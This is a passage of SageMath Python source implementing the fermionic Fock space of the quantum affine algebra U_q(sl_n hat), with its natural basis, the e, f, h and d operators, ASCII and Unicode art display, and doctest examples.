from sage.rings.fraction_field import FractionField
from sage.rings.finite_rings.integer_mod_ring import IntegerModRing
from sage.combinat.free_module import CombinatorialFreeModule
from sage.combinat.partition import (_Partitions, Partitions,
RegularPartitions_truncated)
from sage.combinat.partition_tuple import PartitionTuples
from sage.algebras.quantum_groups.q_numbers import q_factorial
#############################
## Fock space options
class FockSpaceOptions(GlobalOptions):
r"""
Sets and displays the global options for elements of the Fock
space classes. If no parameters are set, then the function
returns a copy of the options dictionary.
The ``options`` to Fock space can be accessed as the method
:obj:`FockSpaceOptions` of :class:`FockSpace` and
related parent classes.
@OPTIONS@
EXAMPLES::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: x = F.an_element()
sage: y = x.f(3,2,2,0,1)
sage: y
((3*q^2+3)/q)*|3, 3, 1> + (3*q^2+3)*|3, 2, 1, 1>
sage: Partitions.options.display = 'diagram'
sage: y
((3*q^2+3)/q)*|3, 3, 1> + (3*q^2+3)*|3, 2, 1, 1>
sage: ascii_art(y)
((3*q^2+3)/q)*|***\ + (3*q^2+3)*|***\
|*** > |** \
|* / |* /
|* /
sage: FockSpace.options.display = 'list'
sage: ascii_art(y)
((3*q^2+3)/q)*F + (3*q^2+3)*F
*** ***
*** **
* *
*
sage: Partitions.options.display = 'compact_high'
sage: y
((3*q^2+3)/q)*F3^2,1 + (3*q^2+3)*F3,2,1^2
sage: Partitions.options._reset()
sage: FockSpace.options._reset()
"""
NAME = 'FockSpace'
module = 'sage.algebras.quantum_groups.fock_space'
display = dict(default="ket",
description='Specifies how terms of the natural basis of Fock space should be printed',
values=dict(ket='displayed as a ket in bra-ket notation',
list='displayed as a list'),
case_sensitive=False)
###############################################################################
## Fock space
class FockSpace(Parent, UniqueRepresentation):
r"""
The (fermionic) Fock space of `U_q(\widehat{\mathfrak{sl}}_n)` with
multicharge `(\gamma_1, \ldots, \gamma_m)`.
Fix a positive integer `n > 1` and fix a sequence
`\gamma = (\gamma_1, \ldots, \gamma_m)`, where `\gamma_i \in \ZZ / n \ZZ`.
*(fermionic) Fock space* `\mathcal{F}` with multicharge `\gamma` is a
`U_q(\widehat{\mathfrak{gl}}_n)`-representation with a basis
`\{ |\lambda \rangle \}`, where `\lambda` is a partition tuple of
level `m`. By considering `\mathcal{F}` as a
`U_q(\widehat{\mathfrak{sl}}_n)`-representation,
it is not irreducible, but the submodule generated by
`| \emptyset^m \rangle` is isomorphic to the highest weight module
`V(\mu)`, where the highest weight `\mu = \sum_i \Lambda_{\gamma_i}`.
Let `R_i(\lambda)` and `A_i(\lambda)` be the set of removable and
addable, respectively, `i`-cells of `\lambda`, where an `i`-cell is
a cell of residue `i` (i.e., content modulo n).
The action of `U_q(\widehat{\mathfrak{sl}}_n)` is given as follows:
.. MATH::
\begin{aligned}
e_i | \lambda \rangle & = \sum_{c \in R_i(\lambda)}
q^{M_i(\lambda, c)} | \lambda + c \rangle, \\
f_i | \lambda \rangle & = \sum_{c \in A_i(\lambda)}
q^{N_i(\lambda, c)} | \lambda - c \rangle, \\
q^{h_i} | \lambda \rangle & = q^{N_i(\lambda)} | \lambda \rangle, \\
q^d | \lambda \rangle & = q^{-N^{(0)}(\lambda)} | \lambda \rangle,
\end{aligned}
where
- `M_i(\lambda, c)` (resp. `N_i(\lambda, c)`) is the number of removable
(resp. addable) `i`-cells of `\lambda` below (resp. above) `c` minus
the number of addable (resp. removable) `i`-cells of `\lambda` below
(resp. above) `c`,
- `N_i(\lambda)` is the number of addable `i`-cells minus the number of
removable `i`-cells, and
- `N^{(0)}(\lambda)` is the total number of `0`-cells of `\lambda`.
Another interpretation of Fock space is as a semi-infinite wedge
product (which each factor we can think of as fermions). This allows
a description of the `U_q(\widehat{\mathfrak{gl}}_n)` action, as well
as an explicit description of the bar involution. In particular, the
bar involution is the unique semi-linear map satisfying
- `q \mapsto q^{-1}`,
- `\overline{| \emptyset \rangle} = | \emptyset \rangle`, and
- `\overline{f_i | \lambda \rangle} = f_i \overline{| \lambda \rangle}`.
We then define the *canonical basis* or *(lower) global crystal basis*
as the unique basis of `\mathcal{F}` such that
- `\overline{G(\lambda)} = G(\lambda)`,
- `G(\lambda) \equiv | \lambda \rangle \mod q \ZZ[q]`.
It is also known that this basis is upper unitriangular with respect to
dominance order and that both the natural basis and the canonical basis
of `\mathcal{F}` are `\ZZ`-graded by `|\lambda|`. Additionally, the
transition matrices `(d_{\lambda, \nu})_{\lambda,\nu \vdash n}` given by
.. MATH::
G(\nu) = \sum_{\lambda \vdash |\nu|} d_{\lambda,\nu} |\lambda \rangle
described the decomposition matrices of the Hecke algebras when
restricting to `V(\mu)` [Ariki1996]_.
To go between the canonical basis and the natural basis, for level 1
Fock space, we follow the LLT algorithm [LLT1996]_. Indeed, we first
construct an basis `\{ A(\nu) \}` that is an approximation to the
lower global crystal basis, in the sense that it is bar-invariant,
and then use Gaussian elimination to construct the lower global
crystal basis. For higher level Fock space, we follow [Fayers2010]_,
where the higher level is considered as a tensor product space
of the corresponding level 1 Fock spaces.
There are three bases currently implemented:
- The natural basis:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace.F`.
- The approximation basis that comes from LLT(-type) algorithms:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace.A`.
- The lower global crystal basis:
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace.G`.
.. TODO::
- Implement the approximation and lower global crystal bases on
all partition tuples.
- Implement the bar involution.
- Implement the full `U_q(\widehat{\mathfrak{gl}})`-action.
INPUT:
- ``n`` -- the value `n`
- ``multicharge`` -- (default: ``[0]``) the multicharge
- ``q`` -- (optional) the parameter `q`
- ``base_ring`` -- (optional) the base ring containing ``q``
EXAMPLES:
We start by constructing the natural basis and doing
some computations::
sage: Fock = FockSpace(3)
sage: F = Fock.natural()
sage: u = F.highest_weight_vector()
sage: u.f(0,2,(1,2),0)
|2, 2, 1> + q*|2, 1, 1, 1>
sage: u.f(0,2,(1,2),0,2)
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>
sage: x = u.f(0,2,(1,2),0,2)
sage: [x.h(i) for i in range(3)]
[q*|3, 2, 1> + q^2*|3, 1, 1, 1> + q^2*|2, 2, 2> + q^3*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>]
sage: [x.h_inverse(i) for i in range(3)]
[1/q*|3, 2, 1> + |3, 1, 1, 1> + |2, 2, 2> + q*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>,
|3, 2, 1> + q*|3, 1, 1, 1> + q*|2, 2, 2> + q^2*|2, 1, 1, 1, 1>]
sage: x.d()
1/q^2*|3, 2, 1> + 1/q*|3, 1, 1, 1> + 1/q*|2, 2, 2> + |2, 1, 1, 1, 1>
Next, we construct the approximation and lower global crystal bases
and convert to the natural basis::
sage: A = Fock.A()
sage: G = Fock.G()
sage: F(A[4,2,2,1])
|4, 2, 2, 1> + q*|4, 2, 1, 1, 1>
sage: F(G[4,2,2,1])
|4, 2, 2, 1> + q*|4, 2, 1, 1, 1>
sage: F(A[7,3,2,1,1])
|7, 3, 2, 1, 1> + q*|7, 2, 2, 2, 1> + q^2*|7, 2, 2, 1, 1, 1>
+ q*|6, 3, 3, 1, 1> + q^2*|6, 2, 2, 2, 2> + q^3*|6, 2, 2, 1, 1, 1, 1>
+ q*|5, 5, 2, 1, 1> + q^2*|5, 4, 3, 1, 1> + (q^2+1)*|4, 4, 3, 2, 1>
+ (q^3+q)*|4, 4, 3, 1, 1, 1> + (q^3+q)*|4, 4, 2, 2, 2>
+ (q^4+q^2)*|4, 4, 2, 1, 1, 1, 1> + q*|4, 3, 3, 3, 1>
+ q^2*|4, 3, 2, 1, 1, 1, 1, 1> + q^2*|4, 2, 2, 2, 2, 2>
+ q^3*|4, 2, 2, 2, 1, 1, 1, 1> + q^2*|3, 3, 3, 3, 2>
+ q^3*|3, 3, 3, 1, 1, 1, 1, 1> + q^3*|3, 2, 2, 2, 2, 2, 1>
+ q^4*|3, 2, 2, 2, 2, 1, 1, 1>
sage: F(G[7,3,2,1,1])
|7, 3, 2, 1, 1> + q*|7, 2, 2, 2, 1> + q^2*|7, 2, 2, 1, 1, 1>
+ q*|6, 3, 3, 1, 1> + q^2*|6, 2, 2, 2, 2>
+ q^3*|6, 2, 2, 1, 1, 1, 1> + q*|5, 5, 2, 1, 1>
+ q^2*|5, 4, 3, 1, 1> + q^2*|4, 4, 3, 2, 1>
+ q^3*|4, 4, 3, 1, 1, 1> + q^3*|4, 4, 2, 2, 2>
+ q^4*|4, 4, 2, 1, 1, 1, 1>
sage: A(F(G[7,3,2,1,1]))
A[7, 3, 2, 1, 1] - A[4, 4, 3, 2, 1]
sage: G(F(A[7,3,2,1,1]))
G[7, 3, 2, 1, 1] + G[4, 4, 3, 2, 1]
sage: A(F(G[8,4,3,2,2,1]))
A[8, 4, 3, 2, 2, 1] - A[6, 4, 4, 2, 2, 1, 1] - A[5, 5, 4, 3, 2, 1]
+ ((-q^2-1)/q)*A[5, 4, 4, 3, 2, 1, 1]
sage: G(F(A[8,4,3,2,2,1]))
G[8, 4, 3, 2, 2, 1] + G[6, 4, 4, 2, 2, 1, 1] + G[5, 5, 4, 3, 2, 1]
+ ((q^2+1)/q)*G[5, 4, 4, 3, 2, 1, 1]
We can also construct higher level Fock spaces and perform
similar computations::
sage: Fock = FockSpace(3, [1,0])
sage: F = Fock.natural()
sage: A = Fock.A()
sage: G = Fock.G()
sage: F(G[[2,1],[4,1,1]])
|[2, 1], [4, 1, 1]> + q*|[2, 1], [3, 2, 1]>
+ q^2*|[2, 1], [3, 1, 1, 1]> + q^2*|[2], [4, 2, 1]>
+ q^3*|[2], [4, 1, 1, 1]> + q^4*|[2], [3, 2, 1, 1]>
+ q*|[1, 1, 1], [4, 1, 1]> + q^2*|[1, 1, 1], [3, 2, 1]>
+ q^3*|[1, 1, 1], [3, 1, 1, 1]> + q^2*|[1, 1], [3, 2, 2]>
+ q^3*|[1, 1], [3, 1, 1, 1, 1]> + q^3*|[1], [4, 2, 2]>
+ q^4*|[1], [4, 1, 1, 1, 1]> + q^4*|[1], [3, 2, 2, 1]>
+ q^5*|[1], [3, 2, 1, 1, 1]>
sage: A(F(G[[2,1],[4,1,1]]))
A([2, 1], [4, 1, 1]) - A([2], [4, 2, 1])
sage: G(F(A[[2,1],[4,1,1]]))
G([2, 1], [4, 1, 1]) + G([2], [4, 2, 1])
For level `0`, the truncated Fock space of [GW1999]_
is implemented. This can be used to improve the speed
of the computation of the lower global crystal basis,
provided the truncation is not too small::
sage: FS = FockSpace(2)
sage: F = FS.natural()
sage: G = FS.G()
sage: FS3 = FockSpace(2, truncated=3)
sage: F3 = FS3.natural()
sage: G3 = FS3.G()
sage: F(G[6,2,1])
|6, 2, 1> + q*|5, 3, 1> + q^2*|5, 2, 2> + q^3*|5, 2, 1, 1>
+ q*|4, 2, 1, 1, 1> + q^2*|3, 3, 1, 1, 1> + q^3*|3, 2, 2, 1, 1>
+ q^4*|3, 2, 1, 1, 1, 1>
sage: F3(G3[6,2,1])
|6, 2, 1> + q*|5, 3, 1> + q^2*|5, 2, 2>
sage: FS5 = FockSpace(2, truncated=5)
sage: F5 = FS5.natural()
sage: G5 = FS5.G()
sage: F5(G5[6,2,1])
|6, 2, 1> + q*|5, 3, 1> + q^2*|5, 2, 2> + q^3*|5, 2, 1, 1>
+ q*|4, 2, 1, 1, 1> + q^2*|3, 3, 1, 1, 1> + q^3*|3, 2, 2, 1, 1>
REFERENCES:
- [Ariki1996]_
- [LLT1996]_
- [Fayers2010]_
- [GW1999]_
"""
@staticmethod
def __classcall_private__(cls, n, multicharge=[0], q=None, base_ring=None, truncated=None):
r"""
Standardize input to ensure a unique representation.
EXAMPLES::
sage: R.<q> = ZZ[]
sage: F1 = FockSpace(3, [0])
sage: F2 = FockSpace(3, 0, q)
sage: F3 = FockSpace(3, (0,), q, R)
sage: F1 is F2 and F2 is F3
True
"""
if q is None:
base_ring = PolynomialRing(ZZ, 'q')
q = base_ring.gen(0)
if base_ring is None:
base_ring = q.parent()
base_ring = FractionField(base_ring)
q = base_ring(q)
M = IntegerModRing(n)
if multicharge in ZZ:
multicharge = (multicharge,)
multicharge = tuple(M(e) for e in multicharge)
if truncated is not None:
return FockSpaceTruncated(n, truncated, q, base_ring)
return super(FockSpace, cls).__classcall__(cls, n, multicharge, q, base_ring)
def __init__(self, n, multicharge, q, base_ring):
r"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(3, [0])
sage: TestSuite(F).run()
sage: F = FockSpace(3, [1, 2])
sage: TestSuite(F).run()
"""
self._n = n
self._q = q
self._multicharge = multicharge
self._index_set = set(range(n))
cat = ModulesWithBasis(base_ring).WithRealizations()
Parent.__init__(self, base=base_ring, category=cat)
self._realizations = [self.natural(), self.A(), self.G()]
def _repr_(self):
r"""
Return a string representation of ``self``.
EXAMPLES::
sage: FockSpace(2)
Fock space of rank 2 of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
sage: FockSpace(4, [2, 0, 1])
Fock space of rank 4 of multicharge (2, 0, 1) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
"""
return "Fock space of rank {} of multicharge {} over {}".format(
self._n, self._multicharge, self.base_ring())
def _latex_(self):
r"""
Return a latex representation of ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: latex(F)
\mathcal{F}_{q}^{2}\left(0\right)
sage: F = FockSpace(4, [2, 0, 1])
sage: latex(F)
\mathcal{F}_{q}^{4}\left(2, 0, 1\right)
"""
from sage.misc.latex import latex
return "\\mathcal{{F}}_{{{q}}}^{{{n}}}{mc}".format(q=latex(self._q), n=self._n,
mc=latex(self._multicharge))
options = FockSpaceOptions
def q(self):
r"""
Return the parameter `q` of ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.q()
q
sage: F = FockSpace(2, q=-1)
sage: F.q()
-1
"""
return self._q
def multicharge(self):
r"""
Return the multicharge of ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.multicharge()
(0,)
sage: F = FockSpace(4, [2, 0, 1])
sage: F.multicharge()
(2, 0, 1)
"""
return self._multicharge
def a_realization(self):
r"""
Return a realization of ``self``.
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS.a_realization()
Fock space of rank 2 of multicharge (0,) over
Fraction Field of Univariate Polynomial Ring in q over Integer Ring
in the natural basis
"""
return self.natural()
def inject_shorthands(self, verbose=True):
r"""
Import standard shorthands into the global namespace.
INPUT:
- ``verbose`` -- boolean (default ``True``) if ``True``, prints
the defined shorthands
EXAMPLES::
sage: FS = FockSpace(4)
sage: FS.inject_shorthands()
Injecting A as shorthand for Fock space of rank 4
of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
in the approximation basis
Injecting F as shorthand for Fock space of rank 4
of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
in the natural basis
Injecting G as shorthand for Fock space of rank 4
of multicharge (0,) over Fraction Field
of Univariate Polynomial Ring in q over Integer Ring
in the lower global crystal basis
"""
from sage.misc.misc import inject_variable
for shorthand in ['A', 'F', 'G']:
realization = getattr(self, shorthand)()
if verbose:
print('Injecting {} as shorthand for {}'.format(shorthand, realization))
inject_variable(shorthand, realization)
def highest_weight_vector(self):
r"""
Return the module generator of ``self`` in the natural basis.
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS.highest_weight_vector()
|>
sage: FS = FockSpace(4, [2, 0, 1])
sage: FS.highest_weight_vector()
|[], [], []>
"""
return self.natural().highest_weight_vector()
def __getitem__(self, i):
r"""
Return the basis element indexed by ``i``.
INPUT:
- ``i`` -- a partition
EXAMPLES::
sage: FS = FockSpace(2)
sage: FS[[]]
|>
sage: FS[1]
|1>
sage: FS[2,2,1]
|2, 2, 1>
sage: FS = FockSpace(3, [1, 2])
sage: FS[[], []]
|[], []>
sage: FS[[2,1], [3,1,1]]
|[2, 1], [3, 1, 1]>
"""
return self.natural()[i]
class F(CombinatorialFreeModule, BindableClass):
r"""
The natural basis of the Fock space.
This is the basis indexed by partitions. This has an action
of the quantum group `U_q(\widehat{\mathfrak{sl}}_n)`
described in
:class:`~sage.algebras.quantum_groups.fock_space.FockSpace`.
EXAMPLES:
We construct the natural basis and perform some computations::
sage: F = FockSpace(4).natural()
sage: q = F.q()
sage: u = F.highest_weight_vector()
sage: u
|>
sage: u.f(0,1,2)
|3>
sage: u.f(0,1,3)
|2, 1>
sage: u.f(0,1,2,0)
0
sage: u.f(0,1,3,2)
|3, 1> + q*|2, 1, 1>
sage: u.f(0,1,2,3)
|4> + q*|3, 1>
sage: u.f(0,1,3,2,2,0)
((q^2+1)/q)*|3, 2, 1>
sage: x = (q^4 * u + u.f(0,1,3,(2,2)))
sage: x
|3, 1, 1> + q^4*|>
sage: x.f(0,1,3)
|4, 3, 1> + q*|4, 2, 1, 1> + q*|3, 3, 2>
+ q^2*|3, 2, 2, 1> + q^4*|2, 1>
sage: x.h_inverse(2)
q^2*|3, 1, 1> + q^4*|>
sage: x.h_inverse(0)
1/q*|3, 1, 1> + q^3*|>
sage: x.d()
1/q*|3, 1, 1> + q^4*|>
sage: x.e(2)
|3, 1> + q*|2, 1, 1>
"""
def __init__(self, F):
"""
Initialize ``self``.
EXAMPLES::
sage: F = FockSpace(2).natural()
sage: TestSuite(F).run() # long time
"""
self._basis_name = "natural"
# If the cell x is above the cell y
if len(F._multicharge) == 1: # For partitions
self._above = lambda x,y: x[0] < y[0]
else: # For partition tuples
self._above = lambda x,y: x[0] < y[0] or (x[0] == y[0] and x[1] < y[1])
self._addable = lambda la,i: [x for x in la.outside_corners()
if la.content(*x, multicharge=F._multicharge) == i]
self._removable = lambda la,i: [x for x in la.corners()
if la.content(*x, multicharge=F._multicharge) == i]
indices = PartitionTuples(level=len(F._multicharge))
CombinatorialFreeModule.__init__(self, F.base_ring(), indices,
prefix='F',
latex_prefix='',
bracket=False,
latex_bracket=['\\left\\lvert', '\\right\\rangle'],
sorting_reverse=True,
category=FockSpaceBases(F))
options = FockSpaceOptions
def _repr_term(self, m):
r"""
Return a representation of the monomial indexed by ``m``.
EXAMPLES::
sage: F = FockSpace(2).natural()
sage: F._repr_term(Partition([2,1,1]))
'|2, 1, 1>'
sage: F.highest_weight_vector()
|>
sage: F = FockSpace(2, [2, 1, 1]).natural()
sage: mg = F.highest_weight_vector(); mg
|[], [], []>
sage: q = F.q()
sage: mg.f(1).f(1).f(0) / (q^-1 + q)
|[1], [1], [1]> + q*|[], [2], [1]> + q^2*|[], [1, 1], [1]>
+ q^3*|[], [1], [2]> + q^4*|[], [1], [1, 1]>
"""
if self.options.display != 'ket':
return CombinatorialFreeModule._repr_term(self, m)
return '|' + m._repr_list()[1:-1] + ">" # Strip the outer brackets of m
def _ascii_art_term(self, m):
r"""
Return a representation of the monomial indexed by ``m``.
EXAMPLES::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: x = F.an_element()
sage: ascii_art(x)
3*|**> + 2*|*> + 2*|->
sage: ascii_art(x.f(3,2,2,0,1))
((3*q^2+3)/q)*|***\ + (3*q^2+3)*|***\
|*** > |** \
|* / |* /
|* /
"""
if self.options.display != 'ket':
return CombinatorialFreeModule._ascii_art_term(self, m)
from sage.typeset.ascii_art import AsciiArt, ascii_art
a = ascii_art(m)
h = a.height()
l = AsciiArt(['|']*h)
r = AsciiArt([' '*i + '\\' for i in range(h//2)], baseline=0)
if h % 2:
r *= AsciiArt([' '*(h//2) + '>'], baseline=0)
r *= AsciiArt([' '*i + '/' for i in reversed(range(h//2))], baseline=0)
ret = l + a + r
ret._baseline = h - 1
return ret
def _unicode_art_term(self, m):
r"""
Return an unicode art representing the generator indexed by ``m``.
TESTS::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: x = F.an_element()
sage: unicode_art(x)
3*│┌┬┐╲ + 2*│┌┐╲ + 2*│∅〉
│└┴┘╱ │└┘╱
sage: unicode_art(x.f(3,2,2,0,1))
((3*q^2+3)/q)*│┌┬┬┐╲ + (3*q^2+3)*│┌┬┬┐╲
│├┼┼┤ ╲ │├┼┼┘ ╲
│├┼┴┘ ╱ │├┼┘ 〉
│└┘ ╱ │├┤ ╱
│└┘ ╱
"""
if self.options.display != 'ket':
return CombinatorialFreeModule._ascii_art_term(self, m)
from sage.typeset.unicode_art import UnicodeArt, unicode_art
a = unicode_art(m)
h = a.height()
l = UnicodeArt([u'│']*h, baseline=0)
r = UnicodeArt([u" "*i + u'╲' for i in range(h//2)], baseline=0)
if h % 2:
r *= UnicodeArt([u" "*(h//2) + u'〉'], baseline=0)
r *= UnicodeArt([u" "*i + u'╱' for i in reversed(range(h//2))], baseline=0)
ret = l + a + r
ret._baseline = h - 1
return ret
def _test_representation(self, **options):
r"""
Test that ``self`` is a
`U_q(\widehat{\mathfrak{sl}}_n)`-representation.
EXAMPLES::
sage: F = FockSpace(3, [0,1]).natural()
sage: F._test_representation() # long time
"""
from sage.combinat.root_system.cartan_matrix import CartanMatrix
from sage.combinat.root_system.root_system import RootSystem
from sage.algebras.quantum_groups.q_numbers import q_binomial
tester = self._tester(**options)
F = self.realization_of()
q = F.q()
n = F._n
I = F._index_set
A = CartanMatrix(['A',n-1,1])
P = RootSystem(['A',n-1,1]).weight_lattice()
al = P.simple_roots()
ac = P.simple_coroots()
zero = self.zero()
for x in self.some_elements():
for i in I:
for j in I:
tester.assertEqual(x.h_inverse(j).f(i).h(j), q**-al[i].scalar(ac[j]) * x.f(i))
tester.assertEqual(x.h_inverse(j).e(i).h(j), q**al[i].scalar(ac[j]) * x.e(i))
if i == j:
tester.assertEqual(x.f(i).e(i) - x.e(i).f(i),
(x.h(i) - x.h_inverse(i)) / (q - q**-1))
continue
tester.assertEqual(x.f(j).e(i) - x.e(i).f(j), zero)
aij = A[i,j]
tester.assertEqual(zero,
sum((-1)**k
* q_binomial(1-aij, k, q)
* x.e(*([i]*(1-aij-k) + [j] + [i]*k))
for k in range(1-aij+1)))
tester.assertEqual(zero,
sum((-1)**k
* q_binomial(1-aij, k, q)
* x.f(*([i]*(1-aij-k) + [j] + [i]*k))
for k in range(1-aij+1)))
class Element(CombinatorialFreeModule.Element):
"""
An element in the Fock space.
"""
def _e(self, i):
r"""
Apply `e_i` to ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1]._e(1)
1/q*|1, 1, 1>
sage: F[2,1,1]._e(0)
|2, 1>
sage: F[3,2,1]._e(1)
0
sage: F = FockSpace(4, [2, 0, 1])
sage: F[[2,1],[1],[2]]._e(2)
|[2, 1], [1], [1]>
"""
P = self.parent()
def N_left(la, x, i):
return (sum(1 for y in P._addable(la, i) if P._above(x, y))
- sum(1 for y in P._removable(la, i) if P._above(x, y)))
q = P.realization_of()._q
return P.sum_of_terms(( la.remove_cell(*x), c * q**(-N_left(la, x, i)) )
for la,c in self for x in P._removable(la, i))
def e(self, *data):
r"""
Apply the action of the divided difference operator
`e_i^{(p)}` on ``self``.
INPUT:
- ``*data`` -- a list of indices or pairs `(i, p)`
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1].e(1)
1/q*|1, 1, 1>
sage: F[2,1,1].e(0)
|2, 1>
sage: F[2,1,1].e(0).e(1)
|2> + q*|1, 1>
sage: F[2,1,1].e(0).e(1).e(1)
((q^2+1)/q)*|1>
sage: F[2,1,1].e(0).e((1, 2))
|1>
sage: F[2,1,1].e(0, 1, 1, 1)
0
sage: F[2,1,1].e(0, (1, 3))
0
sage: F[2,1,1].e(0, (1,2), 0)
|>
sage: F[2,1,1].e(1, 0, 1, 0)
1/q*|>
sage: F = FockSpace(4, [2, 0, 1])
sage: F[[2,1],[1],[2]]
|[2, 1], [1], [2]>
sage: F[[2,1],[1],[2]].e(2)
|[2, 1], [1], [1]>
sage: F[[2,1],[1],[2]].e(1)
1/q*|[2], [1], [2]>
sage: F[[2,1],[1],[2]].e(0)
1/q*|[2, 1], [], [2]>
sage: F[[2,1],[1],[2]].e(3)
1/q^2*|[1, 1], [1], [2]>
sage: F[[2,1],[1],[2]].e(3, 2, 1)
1/q^2*|[1, 1], [1], []> + 1/q^2*|[1], [1], [1]>
sage: F[[2,1],[1],[2]].e(3, 2, 1, 0, 1, 2)
2/q^3*|[], [], []>
"""
ret = self
q = self.parent().realization_of()._q
I = self.parent().realization_of()._index_set
for i in data:
if isinstance(i, tuple):
i, p = i
else:
p = 1
if i not in I:
raise ValueError("{} not in the index set".format(i))
for _ in range(p):
ret = ret._e(i)
if p > 1:
ret = ret / q_factorial(p, q)
return ret
def _f(self, i):
r"""
Apply `f_i` to ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.highest_weight_vector()._f(0)
|1>
sage: F[5,2,2,1]._f(0)
1/q*|5, 2, 2, 2> + |5, 2, 2, 1, 1>
sage: F[5,2,2,1]._f(1)
|6, 2, 2, 1> + q*|5, 3, 2, 1>
sage: F = FockSpace(4, [2, 0, 1])
sage: F[[3,1], [1,1,1], [4,2,2]]._f(0)
1/q*|[3, 1, 1], [1, 1, 1], [4, 2, 2]>
sage: F[[3,1], [1,1,1], [4,2,2]]._f(1)
|[4, 1], [1, 1, 1], [4, 2, 2]>
+ |[3, 1], [2, 1, 1], [4, 2, 2]>
+ q*|[3, 1], [1, 1, 1, 1], [4, 2, 2]>
+ q^2*|[3, 1], [1, 1, 1], [5, 2, 2]>
"""
P = self.parent()
def N_right(la, x, i):
return (sum(1 for y in P._addable(la, i) if P._above(y, x))
- sum(1 for y in P._removable(la, i) if P._above(y, x)))
q = P.realization_of()._q
return P.sum_of_terms( (la.add_cell(*x), c * q**N_right(la, x, i))
for la,c in self for x in P._addable(la, i) )
def f(self, *data):
r"""
Apply the action of the divided difference operator
`f_i^{(p)}` on ``self``.
INPUT:
- ``*data`` -- a list of indices or pairs `(i, p)`
EXAMPLES::
sage: F = FockSpace(2)
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|1>
sage: mg.f(0).f(1)
|2> + q*|1, 1>
sage: mg.f(0).f(0)
0
sage: mg.f((0, 2))
0
sage: mg.f(0, 1, 1)
((q^2+1)/q)*|2, 1>
sage: mg.f(0, (1, 2))
|2, 1>
sage: mg.f(0, 1, 0)
|3> + q*|1, 1, 1>
sage: F = FockSpace(4, [2, 0, 1])
sage: mg = F.highest_weight_vector()
sage: mg.f(0)
|[], [1], []>
sage: mg.f(2)
|[1], [], []>
sage: mg.f(1)
|[], [], [1]>
sage: mg.f(1, 0)
|[], [1], [1]> + q*|[], [], [1, 1]>
sage: mg.f(0, 1)
|[], [2], []> + q*|[], [1], [1]>
sage: mg.f(0, 1, 3)
|[], [2, 1], []> + q*|[], [1, 1], [1]>
sage: mg.f(3)
0
"""
ret = self
q = self.parent().realization_of()._q
I = self.parent().realization_of()._index_set
for i in data:
if isinstance(i, tuple):
i, p = i
else:
p = 1
if i not in I:
raise ValueError("{} not in the index set".format(i))
for _ in range(p):
ret = ret._f(i)
if p > 1:
ret = ret / q_factorial(p, q)
return ret
def h(self, *data):
r"""
Apply the action of `h_i` on ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1].h(0)
q*|2, 1, 1>
sage: F[2,1,1].h(1)
|2, 1, 1>
sage: F[2,1,1].h(0, 0)
q^2*|2, 1, 1>
sage: F = FockSpace(4, [2,0,1])
sage: elt = F[[2,1],[1],[2]]
sage: elt.h(0)
q^2*|[2, 1], [1], [2]>
sage: elt.h(1)
|[2, 1], [1], [2]>
sage: elt.h(2)
|[2, 1], [1], [2]>
sage: elt.h(3)
q*|[2, 1], [1], [2]>
"""
P = self.parent()
q = P.realization_of()._q
I = self.parent().realization_of()._index_set
d = self.monomial_coefficients(copy=True)
for i in data:
if i not in I:
raise ValueError("{} not in the index set".format(i))
for la in d:
d[la] *= q**(len(P._addable(la, i)) - len(P._removable(la, i)))
return P._from_dict(d, coerce=False)
def h_inverse(self, *data):
r"""
Apply the action of `h_i^{-1}` on ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F[2,1,1].h_inverse(0)
1/q*|2, 1, 1>
sage: F[2,1,1].h_inverse(1)
|2, 1, 1>
sage: F[2,1,1].h_inverse(0, 0)
1/q^2*|2, 1, 1>
sage: F = FockSpace(4, [2,0,1])
sage: elt = F[[2,1],[1],[2]]
sage: elt.h_inverse(0)
1/q^2*|[2, 1], [1], [2]>
sage: elt.h_inverse(1)
|[2, 1], [1], [2]>
sage: elt.h_inverse(2)
|[2, 1], [1], [2]>
sage: elt.h_inverse(3)
1/q*|[2, 1], [1], [2]>
"""
P = self.parent()
q = P.realization_of()._q
I = self.parent().realization_of()._index_set
d = self.monomial_coefficients(copy=True)
for i in data:
if i not in I:
raise ValueError("{} not in the index set".format(i))
for la in d:
d[la] *= q**-(len(P._addable(la, i)) - len(P._removable(la, i)))
return P._from_dict(d, coerce=False)
def d(self):
r"""
Apply the action of `d` on ``self``.
EXAMPLES::
sage: F = FockSpace(2)
sage: F.highest_weight_vector().d()
|>
sage: F[2,1,1].d()
1/q^2*|2, 1, 1>
sage: F[5,3,3,1,1,1].d()
1/q^7*|5, 3, 3, 1, 1, 1>
sage: F = FockSpace(4, [2,0,1])
sage: F.highest_weight_vector().d()
|[], [], []>
sage: F[[2,1],[1],[2]].d()
1/q*|[2, 1], [1], [2]>
sage: F[[4,2,2,1],[1],[5,2]].d()
1/q^5*|[4, 2, 2, 1], [1], [5, 2]>
